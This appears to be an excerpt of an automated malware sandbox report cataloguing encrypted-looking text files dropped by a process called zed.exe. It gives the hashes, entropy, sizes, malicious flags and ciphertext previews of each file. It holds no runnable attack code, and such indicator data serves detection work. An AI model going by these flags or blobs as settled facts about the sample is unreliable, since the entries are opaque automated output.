                                                                                                                                                                                                                                            MD5:233710FFC79C520CEBF1AC42AB483D34
                                                                                                                                                                                                                                            SHA1:BAF7BB7D0F8B809E1B6A6685D7BA8154E0A56AA0
                                                                                                                                                                                                                                            SHA-256:959676FF46A525B4906EEE96C650CFDC36A59F2A5A53816922BBDFF5929584A9
                                                                                                                                                                                                                                            SHA-512:6371B038D2051E972DA33D3195104489FA71C779497C9ED7B47F73E6E90CED50ACD2F3658E3682FA684CACA136F215E917D87C21BD78C830D2EFEDB71662A466
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64AGkfF0XDRe7VlcETiJrPYM1m1fg2fr7F1_uAcJRhnOpYihAoT4jZ5IpSrDMfgER5PqB9dbUjabtVyxQpI33K-LEYmCZEzHF908-EQjuRBJbQ2tTcpir_fM04t5VAkWAbptCpzPe9_w7deuhK_EX9dcLWEPKT3x7dL7CuM_Hmnf-c4hUgHGJX-aAUH3N5HfAIK3hjiu5IWIhe6w4NDBnCCvegYi64Hf96uvd55WkxNK6asL6DZzx7PAHDw_GomAvGlzZFaSFdyBGA_oaJWcchKp0W4MFqwtj8r0X8vXALyBHj2hxUUMunFFVznSIDzNFm1ZWVXjS99sARL5T1lpe_2erV5z9ZN1QS42Ofv-FAbPFljL56CVy_6bSo4Jd8A1iUy5pXr24R-EhI9nTz742LDAmIou9ihdsUupGxrumOsxwyRy8WlTtmmPRCOlTHxdNRycLorD1If6iP61e3g_hYvYr0aMuHNNGdLZfVct0A3h7FWphnNncsDm-nQpMeEO_8HmeUdO3cK_KrFbzHec-hg5hUz0RLbXSM4lwxCDwwZ4t_VLa91Bjb4ZjkXKjlNKBacFlrO0IcWGy20tai3WZ7TBxbu5GwR6shgTzNu6SCS9GvX6xul3dtuC1XSEtqOB3UsMKYcsKTvtN_jZGJ7TDXYCqlUymOawxGAzUzc0PtH22VNawYvUFChHtTS1QoVEwcvjcq0F7Orz1_OJ8-UHI4AOs3r3rwA2xOhJ6by6P8V75a4bUp2a-Lkcir5k9USeR5Cjs3Uu1xf-DUJNYYVMRF-RA-5YSlAMigmJgJ7DFzEgE3E_ofRC0m7fdmLZhm3zJro7ZA4mA2iZh13_8MmAKc55VilhP1yG9j9Vi5lcQwutwqsdV0kfNVCLLsUGBt4abmqxaveEwKf9MRJG4sXZv8s9yfx6PJK1BJ7GG69_xDfjmsZAArECLa4HseqEQXv-xR2BTRH6OTKcYr_SYSlDhnlDk_lacI
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.974433444422278
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:WQq5E0lyqQ5KsutUcg75uwb7uyk1xqkhVxyvIocXIzUSlMI/kR9KPYmIyjd+mx0s:3QHQ1qevb79k1tRAzUAtt/03ivU+dgRi
                                                                                                                                                                                                                                            MD5:D00665A604499E17CD02B2E416BEE9EC
                                                                                                                                                                                                                                            SHA1:4AE790C2474804786BDF3506D6DEE94CC1B6CEF5
                                                                                                                                                                                                                                            SHA-256:0958A8ACAAA807C9B7F5D67FBF0A552D786EF6213F1E1E7CFEF5202906A80C2D
                                                                                                                                                                                                                                            SHA-512:D695A12F12C72497F3B70B4160CE4DCACD8206D424103ACB0DCCECB304895CE39BA90AD0C86B23948F8B07B79142C6F082A47437DCBE931344986F7DA57169F1
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:gAAAAABnTC645l54ACMp4P017mDbZY5YLMPd20x-vNTDvHPatGTOQ9JfCdlX3rR0FFlsydXADgNKBOsxP-zelQ4Fp_NvtraThkHPcNbsIWUE1Gn1SM3qt0FftQIa0skj6BO_VXAKK--OFYyTp5IRZ39tuQuDM-fiKqvBT_2AgWHMZEwBslImTp3TCUxZeTKcWO03_feSpkP8TlcDcSSz287Eop1v7kOm3Xp6narpD8SwrES-la37Ot9bj0PHaWb8c2jfLz_WzZSWKLavZUuON22kl-D_2LOx1RJGOcvxkqDOZaQouXhQE3xKNYtxJa1NFUzTBjBWbR8Q2LLNGQJp3Ua8119Du4iEz89LV4IhWVBLeaJXLrn-fYU7aJxnZvzzLXjlYo2lVOudShLI9rY0dcvvE6cbbQ7aVmJrzGg4e7xlbhWIbYo_Y1p5K_c51ptpYhJauYemw-DO4BxjFMN6suuRbZHVXh2biRtRVvDpeAQapSPQw-sBPrXafTfiuoRvl5hAXIBd8lDjFwBBF8nJAeybBkbCm24s37tIETu4UV2jiMvfUmPHWaXAki_HyHPnMf_dbEln2WvJEp_-Pu1NDGu20EZmYf7DN_CA7E-d4Q073qjZofC_K8IwcE6oghdKEpdWkdP1IYCvD0qMr6KnZU-KSbked_a98-Gv7jgbNOm3osGLTro5W-iWxbO_vVHq-Hc38-I8Zk2GP0XnUHAkRGSOXzDT03P23uA7XBvCCllELGWgOwOC1PUwLUYDXzTYqOX5UEC_yr986xZI4va57ZXMuYgZa_HgK11fiFLPW7BwmVnEqzBDJDc-3QBrZbrSmILIYVQDLObBWVB6Lyfxl5d5KWN_t5-2ulSYCORQgfQgml-RyXEAk3PG2vOs3Ab3U-g0hPjNl7YhvLoueEVviKZpoEtO59rretg5z2cXXs2WhBu_j3r6ixsAd-Zcb2dt--bUjqWlPaxtVYh18nnKsKNcOsObqhlVoBhHz3pM
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.977388127954328
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:E/62uCS7KuIMYjTfDlcgHmU1VIyu6X0MlcHrsG3MDyaIcvqXP:u5uKuIMsfDlIUIkk8CcY/f
                                                                                                                                                                                                                                            MD5:0592DCFCE44E441AF744A38BEBEBD1C0
                                                                                                                                                                                                                                            SHA1:5E10A93F3565FCC4C8B9BC15E364F66BB9D737B6
                                                                                                                                                                                                                                            SHA-256:9CBDCF0FA73848AC1482201F43AD5EE09F8970E7891F62A976249DC788CEFF0D
                                                                                                                                                                                                                                            SHA-512:67559BB3EECF28974DA88022117186856AAE372B7BDA2D576A597E59DE544D1515FB3819E686944F4F4FEA7C4798B53E838561B62BEC7B0109F26F9E10D72359
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Ufr5sWi1IrkM7olNwbClG___6vn1mZhS8FjKdci6aybx6L9trtDnxvY5JtCoYvOCpX9OZG6Y6XhVEHqmrpPEkJo1tloPSJWOQnZgEz1g5u5CAQ6ioBvfrW2BbxCF1t_cHCBPqERUHmG3zAI1CZHZ1sIIYF5UZGxMiBvrLb_7GdWfcixgy1hLs6Tf2IJVKigupA5nSxpU6y0w8NdrboQPXCW054eUkrg9KzEqIz95n9Xiv115C6N_wqfya0aP6Wz6EkYEbV04IcRcSwJca3Pa4NhRMCYxk8t66JQMw_sW38r11x49qcCa0G9GdDJEFebn79GqB4ka46sQ982oMaX3T67_BMToEwiF8evSCSwvOC9HIhILOSkXP9BqKzXgsYO1DLvNqUcAwUYbT1mVDk9o2Bgv80usm5OBHiKjrKMI42-fkwAU8OFNmBNfxUPVy1x3WtRgZCY96TCafRXZCATab72u_4y1wYOI_dkXAXqH3pN7RzcFssmyzFKWyLk9er_2HCwlyThEVt0DwsVX3tVV3SCM45flheYnLb4clrEh9CyhxkEz3P6EZ2lwv-9BfcyCDKywa-l_gPBYatdZoBpdD08vD7xvZPxJXvWbe4x8aAVx81ktkxAtWaO7aSe80y9ALJSoyrkC2WUPl0biU7XXUD_uQH8PX7tXIMFsTIDd4pUgTpsaI23aWWIEf_e3Vb_ALbMsc_1biK8Ll7z4Er4VWTOcJqKQit4n3dp4uVEfF-ZZzwBhRnOt5CrZJ3z5rC0zkiU1HoE8exvcvwlDJoiY1Es3tAct3u4ACkj_iL7p3dZ5ywP-my-4WMSzWlDNPhfuplp7nANOnlWbRaeyx5UpqXxHjxnGINWLUG1c5Y8TIrLuBrq8H6vdzm0Ikqk2DVN5ZpnYLqjBGfaxTklo5UC8BHL6RHUb0cuFKMdCT5VocrZvZ23o5EQLT1vgdpIPbVsLMRtpCYKqQcSQjf-XB6lzH-r0fG5x
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.984604916419847
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nUYXouczdNZhRX+9SqqGWPAL/dQBlJHXqdrjcOSDHbWQJ:nUYXoT5hKN0A7dqdX4SDHbW2
                                                                                                                                                                                                                                            MD5:1652A1646F07D909F305DD88CF76D8F3
                                                                                                                                                                                                                                            SHA1:5C413A5208A273688EFD13041E22F6A6FCCA7CB4
                                                                                                                                                                                                                                            SHA-256:EFD772EE10E6AE9733A5C5FA50A764CCD73C37B5D3194AB4ED3E13605EF1554D
                                                                                                                                                                                                                                            SHA-512:1B9E3305101469C72051BA1FEBBEA134E6D692207ED7A73937ED376DCFAC526E179B2605ED250E0ED7557AC8B4B1B1DDAA276554344BE0960F645FA9834B237F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64qw1jfGm47kF5g0qe6ueETolyxUbKa6EZsTcp2-AUFtXog75ylIc3oUIa6N8i1xWinhrOHP6JeaGkPAZivfzGJuuxgusHqW1JQranWawJHf4bvu9yV6WN4dGZlAtWyq49BYCXrdJ6h8c7Iy8j_lbD2hGOO0T1oJ9jbLOtHWUHD69_3vdnR0KBLQMuPa_u_vshqTQuIRy54QCitP9f5MUeBOGt_G7B-5dFugxg6SKsOQxfOnsW2xhUuoRJ5y9PLAuzLc1ENy2MYLrIvDbcvSWCvyQh-0k24CBwqxCMUH4D5BpYQjZt3yZNS1wLO04Offz9pnYRTvqmXmzHaM3AR8E3jSM4i1TB6PN8V_KVNi2EpXRX06KI4FofUMbvq4eYhyAlFVzDfyncFxOXbGK0Cff94WvsmnaAqUkKmb00C9A2_XS_Y8XJ45FgWoeoDcNM2i9j-f-d4fuLQXc3dgyZOd8PzFvX4ohy6qCqF2-1TqCHyu_Kpr12x-SKbtUW3f8_PAfdZ1iQyD-_NevI0hPeFiizab5dCI6vnpV5tUg8_Od_qYirsohcwuKU6nrydB3IYXi40uMAI5_9utsh0cYL-edounKDEqMfMs3DP775_yappNUAWwGHkuiUEJKarI3goiO9IxSwN4-wvTfFGFL8i6jZxHma2pMZ_xXHE12uZcEraQ0-gExkYqNqJnx_jUK54fT9A6-9A2-z7fRV63PV9syzlnl5BjnnVcoZ0w5BZOAW1jbjspCKzAmcfHF-wgAfiwpfN56BYgSHZl0qm3khd_X7hszY6IIKFuiF1Xoprs859LHPoC9iLQqk_BMX2wRLkWtDNKp09oz12gX_oXVGoKgn6TCKcwt9qQBLCunB93ZkNJ52Lm95OkWL38o0-1UkAJx3OAyHu5rmRHEu5ZJsJ8CexyTaJS9-u1HBIUkh-jUZTjkYyl3SSCWqel1RPoGKDDIEJsH0Jy79sd-i7sB0VYvSrT1rMxdq
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.980558341537047
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:Y+ELOlag5tBehs1CwKh14UsAG//yM30PY5cViIz16z2ut2DGSB+:Y+EB/hq1AQ30QAl102ut2DGSk
                                                                                                                                                                                                                                            MD5:75D4A6065B34D3966DDA01838DBB9F1F
                                                                                                                                                                                                                                            SHA1:A196CD05C88ECF49356237442E47D4A4744112B8
                                                                                                                                                                                                                                            SHA-256:59CA7A77339640DD151709511F6B56B6F83CF0BC3DA6F3050D06F538A1B5B8D5
                                                                                                                                                                                                                                            SHA-512:8C347B938DCB6C29C76452AB6F399B9342D878047021EACBC42B310DD28B2D87FCA5FBF17278F8CAFA9A8F5E5F52110A1F4BAD6385759DD2ED728FEC9DFCF65B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64pc2rre_nl62j3iCe4d_dbuPLsfZnCFW7lP-mr2hcyditStIPSVUhXarpGD_QMNFsmecd5Y_CgMCSpRv_HpH-xzg5OtkIZOW18vkdPFIJF1iguuiokkOJezzvk3jgLSArpo3P8VwWzn1jXbTRfLqo2-5zgrJvi7xOPeBh-g9LuzVzgo0M4Ri38X5t53EQibDynHVIqaKQo8LnI2zN3eRY-CznbLmLk6zFBG-vqey_6okp_YywDR_FIWx2A6h5_EZqAn5tKpWlcp80An-orLdSQxVR9ZugTqDgbl7bZ82ioZh7sdy9yD7WFeAhg-1sb6QEszvbPaD4ztBBaNT5d7T4_fwpMLqNmY0LLe0R-mgEIdieySF0WcPkI9hPyE3PHKqNVTqp1P8K-J3QLcP1AkL55uesVjj0rZIkkdK0kY3Pa9kDGeDx1bv7uj26BxpUjPwIi9yLZa6j_5IQiudelpRz_mGPnPBBJAOctV_lLrJQoGgLtC0n2-tb-OlAjOeWEH3sxENUAXG1gYBKxJTIjiqoyFsvhnBQ96b-tMbquzu3qXssu_1Pya4hfH51miJKGpgqL3lJ5LbN_CYv_Rregsh6_jPRy_Afqi8ci-a5ipSP8Gjx6ZQnAibmXFAuoX_UuBJ8Akz7iuiMRbHSQGKcq3WsFVSzf-VfFI3LNrWWaY8UXlfTLtK11bTrQZYLd6VfJsKMn7zouFghwtHmEd9R9pQFDJUwOT4cPlj3igkc7JWp0t9Zj3MfCAvbnOi9d4-yQO5oYybm5IfxpajmTeHIP78ZjmLZk-gzDnA4PWoG4HWCZv5GTTR_LNkcIhty1OKvIBbQ07qd7RGMmRvHFWwXBhUUjTD2AJnUrdYoEzGkU8PDfBAMo7JWnIdD9qnhjViHrvYWLYXE50Ziuka_D1-em6M1vYN7eS1jYfUnwsYM0j9eF6-JBalHfTpZzwykcCsBgcQeMARvz-FtWtsbJS5ovrhzmiJwMS20
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.976187711141079
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:xJfoMN2CEf+g/i8qObV/dlZVAis4sUx0I2wsyBYT2S1Yp+7:bfufzBZbblsbbMGyBY6W3
                                                                                                                                                                                                                                            MD5:B513AE333B300C79BA03140E90D07FC5
                                                                                                                                                                                                                                            SHA1:35C82BF836B33D36AE1D65E10CFB555AB82F59C2
                                                                                                                                                                                                                                            SHA-256:BDC429FB2E7B1FEBB7DA08A34D4FA2FB94BF27A9BAE3C06F85B5308546CBA6F7
                                                                                                                                                                                                                                            SHA-512:596E9F91A7F3D96E64D37905D4C5A63777B3BFBD85DDAFE05514A388B41A2613562AD421A13656DFE1BA77C38C9B2627DB8F291D9293B269C350B96BD849BE1B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64i9ySRTvJk9lhVJOJKFvO8EnuuLtPf9MMgXauXDgOoYsegjzPuiSHi_CN9OgeNmqqQ_vh55l3aHInvPVgIhpmnJCL6s0eMvqMJWZyQHh2fnJdOa08BuwVWStBYwbdrcrhZ_qSwqCDw9CqYKzZ85sD9zVZazTELjhx54OdLDMQ0V2k1Kqzg-VWImcOazir-N_qKhbuZu8KyRYIgjxh7ua5DZDreqGwLzFppThzj2UMIMAjsJV-sZmxYZwZ0Xxykw7eB9iqdHx7RQ-ZmGUZvhskSRtemdEdA857MpgtVWPEd0wLHbAwAfMJKQAGKkTaCJWLeifj-09QWVtMdLNTxGBcYjT4ZUc0yNL5pGVWZSAqITLtQClAHkWV3bGr4RGVsoccGXcIioDF-d7rRr2WmH0Tn54htkBWz9ELucjNTgq6Dvw5TtfHLkk36p4WRJjXvhsTEz-0kxTKVPzDdZg9ZidQ7lHF5Jx61FLjXLNP688G85PsSkwl8i5pFXRWsPw-TmOCKDtC7Jc4AZvMKUSFQiS2lMaMuu0ijdC1MpEwE7S3L9R8YBnU_ugz146v8QCZ6yrKS5zr40qXCoCJc7X5jVQlmxJH3S4wy09zRHv1C-uWxD_9YOaVsG7yqZuwVMUroYJmwunsUfUBWLCsvGGpLddTFySPLgofWYK7ePSxOMT2lJC76Qrk-Y0DgVbAE_jyzfGwqg9ceJfQzbZJF7vnzAzHLqU4VLci9gbEJt_BtpBu-3AKYee5UmAehNhA_u3lk56VQKrbCJg880vpW9smICOt4O0jSYiveDMZ7w9momHpLAmmj-AChVIr3fistWqSuKCxc5bxitEU1aAQVzKASKEsBgfXOvFowGWG8dSw0NNqGSAPzy6mQenc3wcCBK1uL8phA9RaUCVQV9Mh67TSxvA96FQ0evxUNcGLZ8Q4uTDzp5t1Gm19MBSvthamKUQJAtO_eZ-1EuPd80oU_T6bpmASvtwVV49x
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.98096449202113
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:7VS4wgpmPpZxE+M+m9SrTqIs4cPvHCfnmF90R8t/Ffx:76gpmPDxE+w9ETqAvc+Rm/1x
                                                                                                                                                                                                                                            MD5:D9145DF4BB204BEC7BC4F318764D159D
                                                                                                                                                                                                                                            SHA1:D7A664F9CAD36AC87C8D9B769F7EEFDDDE430194
                                                                                                                                                                                                                                            SHA-256:A49A0B22D9A5F676497092B3DAFEB76D365DA1F1490C00CBF6A912D6D066F869
                                                                                                                                                                                                                                            SHA-512:2A3852035BC81D9663462BEEF67C15F4D424A418E72A6B1CBB531A2A7321E39B886FB4423D34150F8BD626A061CD897FD0EFB17F62FE3CA24544C1802A968D57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64QFl1s312wsYYLl_a9k6nQuI4G3RK34gMKIenfqofq7dbG2NUsarVNZzXLc9kF-883L_Jt2pfnr-SUm93KshlUtT2WPCAbho806ymkhvHInP6n3h2fZh5xui3l0jModH1-0zj9Nk0tLCWfvVCvoagHaPtZXbhuLUhutQZQq9UEChOuqjHM5Y19QXHfQJ1coQuux21Yy0kUwMjdxHH40F7ooF_sh0P3RgvkYjSM1bEi7Sue3B5m32WazpeKxC9bsOBm1Ujbj5hOTCAlOQi-OhXSuMnoF376eAJw6I_-BvCrhjN8GDbJWTh4dphNKJekQWEFZxDXICk6HcwuU75Isl0fyCkBHyml52VQYzDo0vpNc4QgMCQS1nWPmQx-hYcEI2YzYL8wfcGiJGRpkCZrZBTAoeg0NAZCqwY3QKc4G_pZ4eZEfnTW7JkzmbsKcmjP7IdLGeYz9MauEzhnfhaWcJO1moTp1khBphubHjMtIF66_m3Qph9FVrBOeYbmj831767d5pS2N3XAj90tD1keD73MvxK1-B97B0Qz--uHmrcSGzSmsv9dYPNwr8n6WD8uO-GzYjqxJcrTMU1U56nSvNkClasXJbyTsZ4k79-DDVCdK-D6s335JXuY4xpHukIei0iISzrkb-39hpW0WdSbdffOB_Pq3GT-I7r1NnsaiYITFHIJOdlSVpNHOZ6zhFyxq_d7uC7iIjaDXAoHCGK-bphrRA80dt1QQBFwa1rLNpzg9gfkPa7mvDKgTMSUgSCpqvHsrf1RorEws_6DRqiQVyrnVOHGG6q2ystOv9tSRNlzljJ9UU0_yApxU_2MYDwDgyBa0rWsd5uF6hIgDbkyqP_dhEaHZ0V8cmDaWgu3QCFg6DHOqEndeDSSiTcYpsn_nJ-okGrmfkA5bQ75tmytmV7ODkHXfj7i4XHVeOc1AdYMzcbw1esAcR8tdp_hyqwAVCfA3ui_zlnTK7hp-aEfPjBd2UH1uzd
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9842172073671165
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:FlXPA71q6Zhw2EncHYjQ84enEn48rTrLJFh/4zWRul:Flo71qSsnE84enZ8rHdFhgzL
                                                                                                                                                                                                                                            MD5:CBDB2623B04AD3E27AD2A09DFA850D0A
                                                                                                                                                                                                                                            SHA1:59306A75E52919B3F31252F73E4B3AC517DDA27F
                                                                                                                                                                                                                                            SHA-256:94B65AEA8E57C455203236A1D99D8DFE02B949D97D9FAF954D3CA8F89968ADF2
                                                                                                                                                                                                                                            SHA-512:0DDABB851FC5F4920505509853051ECDB06BC5DE5119FD688017E96BD716DE4968DE5EBBE62507A051BD2EC7CBC513BD3222BD842CAE0855A93D511E055607A5
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:gAAAAABnTC6412MW3sDvXTy5AVcThD-Uf7n-2Rq-czBh-4OMqkQLUpHjARwQykiFvR2ZjzUI58qXDPC_L_GO5nWq5DfnbpIpUUqtGTAh9d0CvUoIt6Si-iAyBrL1R8aj41s4ZxTndlg4R4kyjXWfkRyKrzOwPYDPSetGLsuc_ZbvMeMLOhBnEziYE3Hjdz6poP2diZaf932C5KSA4eMrvVBxOqoomPtGUm8onRa3PK73kzxCCJNniedEZ4NP0N_kqqKkbQQYA0AdBUr9yRPcJI-JzJQq2r1Qu3MJnGkx21vTdWyKjZIGQjWgmOUjk2quVj993gUmzNeM-8KNAIjIenTMqpU0pEDYyOmYpan5zgJfvYzw15dho_41Wif0IyyyAcuyN2pqmSmDPN7UmnPCsxoC71_FhievxC8lNlEgdwIGkHhmAaFLusKBon8tATgZLQjS7-v4bB-8eyQYcfHnM3cz1Fdps5VT1bIvJyG4qfM3vf8rjmox1SDvTw45y1P3t7upbhSSeJbc02bowhRcCq2Hc5cXUmfl46s1P26Y9U3uM5FUxSJqNeuEXOOTCb13fhrv7JWz_B7Ggg1pRKFAJEBpUf2c59Bs9Ghve4Ny2SCqup3lk11tjMkVQGK6vVWfrB66ovscMC_IaKZsuNVXagbsM2ZsYv7KhUCyQS-U4Op9_Lbt4MeZiWxkrWlL0vk-H0mflnJQT6jwQrbcRFolj6-gG4U98dmX5Av1yxMxpVVRIuTaK5JP9DcdiHnH7kJxlLoJlb2BV86F_DFgs9uzkbyyLasDyEJCCfpxXsMzCpT7oZqRmDMxjBzFggPvKGcyNVhTQpujtXoteKRFNB7_hbv2gDAKuEijX92R704flBL4QOxX6GCeHcND2DUT5m_rJq9gVaw6QRTzhZdVcsL3Vd8I9gAh1miuFRrlh17pq0OQaIQ3DanrFymU_dDkKftRuOT6F-BR8lC_36S-p590MVnq7_c189Ic3exuBsmZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9787949389001
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:F5NxRngpvZg2covGUhrti4LRxqnWmM8NnvU:F5NXgk2dvhJi4txqnm6vU
                                                                                                                                                                                                                                            MD5:BE98B46F4FD75468B389C23C35BC0A9E
                                                                                                                                                                                                                                            SHA1:DD2B6E8D4C7B3C309AC84E1B4310F0B1E666A3E6
                                                                                                                                                                                                                                            SHA-256:800A2666DEC5EE085CCC70233AB3BAD4B612194D38453FBD274B09CD3649C502
                                                                                                                                                                                                                                            SHA-512:90E9BEC419E0F3CC450ADD9B15856BB3EE015C6B5E11A642D34BCB402823568F0D080F2E21B868DB54695D259CB4E5079BA0BC1A6340DFF134EC63DEFEA30EFF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Pf-8TsXLIZPHqEf9C9iEKmLWOnxCtTkJqwHRanhJyTyw5oAv5sj3Z63OwyhKOEbhtUnJtJF8njnY1d1G9uJajRL2U0E4WLg464M2NOXZFteorksogXBuPf0-kwjwpvs6N4PjKOSXDkIioWur4Lm8oorzf_Dq0t6ZfHhHiXspCcXSWc5pvUX9NhVaW5PAvDTnWVEhnu5bTpUQFGsTncufWQ5MfqoO39Ko67eGf6EsWnACCN4vDRGhzSjbAyyX-4Gn3_m50yXnSjMsBrucQekWLtT-27cY_jROF_A87sbKHP9DzeCF9ZIBaNLkpQXblE02C5hTAUfORNuM6XSjSm7FJKwNeedTcx_1Nis3vuVxf_thnT0psaOstxwcI_FfLqt1Ax_-_cNOvWC6PLriAJ7d2aDQhZkdQf30CiosQXbmrGch87j8b3OSwlioGq2deISNeW-2zCl3rt6G68qLTzFOsqeowVaiSoxxG3iRaSSbtWwB-j4UXvZrnqDzvsmekgTJlMm4zYXPzBuVWKr2JjGm1-Cx1lT3TS10ANIiA-f_nlTwxJQMwr5uK8wT-E8rGYtIJuG45fSehwtuO88h3Bu0PHwETt8bpaHjOLnnFovNSUHsr2mNSzzw9K1lYiODQLSCwv0rO61SpLcg4NZkMJmdxpajKiRkEvhHIxHgg9TUe5BtG0_olktBoKKXI334pgOs10eYfXbUrwuTziqXZBsCFKOxjAQm3v1G-hrzR0-AyDwCzVHz_su5vRvNgGr-qf3JBcHt4cxxyQIOVOi1UVrshPFF4rLX3XulE1qWA4C7Cs4l2N1e4ki3CCMcHtkuaY8zz7hj1w5qzkvna4-sM9dLp8LFTw2UjpPGNofWmAoNAKOtnxk5RKKiColdpsVIS_OPDnTCZ0zmwA6CFkyrx9HoWpDyovOW9ASF0GMs2WSirG5GKdFuOgiYcjtS6b4HRX-yyu98apMAvzHfiOgGelq7VfM170Nq
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.982413950487403
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:b4Cj1grO0/Ez6siJY+DVAvdp2ho48fCWrHIFOPpKTISwNf2:cOwzEz6rhDVkpX4LWrHP3f2
                                                                                                                                                                                                                                            MD5:48E5A8E61AC3BD313DF5C6AB705315EA
                                                                                                                                                                                                                                            SHA1:4849E2493148C47BE55D56A9BB317E7E5B74C4F8
                                                                                                                                                                                                                                            SHA-256:A440EF51E5C75E15403EF66DA309D1DE8A477996ABB2754AABB6231D44CB2439
                                                                                                                                                                                                                                            SHA-512:10EDEBD28611E3CCEAED4D2F5FF66AF2EEC84D29EC6E0C534124F455C0627C01DDF3383BBD09A7275A2555CBF560C006E343CE9836E17D8D8BAF7D65E393DDC8
                                                                                                                                                                                                                                            Malicious:false
